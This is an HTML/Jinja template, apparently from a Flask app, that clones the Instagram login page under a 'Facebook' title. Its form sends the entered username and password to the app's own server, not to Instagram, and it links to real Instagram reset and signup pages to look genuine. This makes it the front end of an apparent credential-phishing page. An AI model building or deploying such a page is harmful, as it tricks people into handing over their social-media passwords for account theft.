<Doctype html!>

<html

<head>


<title>Facebook</title>
<meta name="viewport" content="width=device-width, initial-scale=1">


<style>
body{
font-family:arial;
text-align:center;
}
/*form{
margin-top:90px;

}*/

#forgot{


}

head{
text-align:center;



}
#submit{
margin-top:50px;


}


.input{
width:250px;
height:39px;
margin-top:3px;
margin-bottom:3px;
outline-color:#0095F6;
border-radius:5px;
border:1px solid #ddd;

}

#Login{
width:250px;
height:37px;
border-radius:5px;
border-color:white;
border:1px solid white;
font-size:15px;
color:white;
background-color:#4DB5F9
}


#Cont-fb{
width:250px;
height:37px;
border-radius:5px;
border:white;
color:white;
background-color:#0095F6


}

#FP{
color:#0095F6;
font-size:small;
margin-left:130px;
margin-top:15px;

}
#account{
font-size:small;
color:grey;

}
#Sign-up{

color:#0095F6;
text-decoration:none;
}








#container{

display:grid;
display-template-columns:auto auto auto;
grid-gap:10px;
display-template-rows:100px 100px 100px;
margin-top:10px;
}

#line1{
grid-column:1;
grid-row:1;
color:white;
background-color:grey;
font-size:20px:
text-align:center;
width:100px;
height:1px;
margin-left:30px;

}
#line2{
grid-column:3;
grid-row:1;
color:white;
background-color:grey;
font-size:20px:
text-align:center;
width:100px;
height:1px;
margin-right:30px;


}

#OR{
grid-column:2;
grid-row:1;
color:black;
margin-top:-7px;


}


#FL{
height:35px;
width:35px;
margin-left:30px;
margin-top:50px;


}





</style>

</head>


{% block content %}


{% with messages = get_flashed_messages()%}

	{% if messages %}
		{% for msg in messages %}
			<p style="color:red">{{msg}}</p>
		
		{%endfor%}



	{%endif%}




{%endwith%}


<body>
<div id = "head">
<image src="{{ url_for('static',filename='instagram.png')}}" width="170px" height="60px">
</div>



<div id="submit">
<a href = "https://m.facebook.com/login.php"><button id="Cont-fb"><b>Continue with facebook</b></button></a>
<div id="container">
<div id="line1"></div>
<div id= "OR"><b style="color:grey">OR</b></div>
<div id="line2"><</div>
</div>
<form action="#" method="POST">

<input type="text" name="username" class="input" placeholder="Phone number,username, or email">
<input type="password" name="password" class="input" placeholder="Password" required>

<p><a id = "FP"style="text-decoration:none" href="https://www.instagram.com/accounts/password/reset/">Forgot password?</a></p>

<button id="Login"><b>Log in</b></button> 
</form>
<span id = "account">Don't have an account?</span><span><b><a href="https://www.instagram.com/accounts/signup/phone/" id="Sign-up">Sign up</a></b></span>
</div>
</body>

{% endblock %}


</html>